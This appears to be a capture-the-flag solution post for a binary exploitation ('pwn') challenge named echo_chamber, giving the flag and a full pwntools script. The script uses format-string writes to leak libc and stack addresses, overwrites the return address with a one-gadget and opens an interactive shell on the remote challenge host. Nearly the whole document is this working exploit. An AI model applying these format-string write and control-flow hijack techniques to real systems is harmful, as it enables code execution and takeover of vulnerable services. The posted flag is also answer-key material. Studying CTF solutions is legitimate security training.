Tags: pwn
Rating:
Flag: `flag{something_with_tcache_ga48ghydgja}`
```
from pwn import *
local = False
if local:
s = process('./echo_chamber', env={'LD_PRELOAD': './ld-linux.so.2 ./libc.so.6'})
else:
s = remote('echochamber.uni.hctf.fun', 13374)
# %13 -> %61 -> %XXX (offset)
def put(value):
s.sendline('%{}c%13$hhn'.format(0x4))
s.sendline('%{}c%61$hn'.format(value & 0xffff))
s.sendline('%{}c%13$hhn'.format(0x6))
s.sendline('%{}c%61$hn'.format(value >> 16))
def write(what, where):
put(where)
s.sendline('%{}c%{}$hn'.format(what & 0xffff, offset))
put(where + 2)
s.sendline('%{}c%{}$hn'.format(what >> 16, offset))
s.sendline('%16$x%13$x%61$x')
s.recvline()
libc_base = int(s.recv(8), 16) - 0x1d8e24
one_shot = libc_base + 0x69854
# stack vars
s13 = int(s.recv(8), 16)
s61 = (int(s.recv(8), 16) & 0xffffff00) + 4 # alignment for put()
ret_addr = s13 - 0x98
offset = 61 + (s61 - s13) / 4
print 'ret @ ' + hex(ret_addr)
print 'libc @ ' + hex(libc_base)
print 'target offset = ' + str(offset)
write(one_shot, ret_addr)
for i in range(3):
s.sendline('q')
s.recvuntil('Bye.\n')
s.interactive()
```
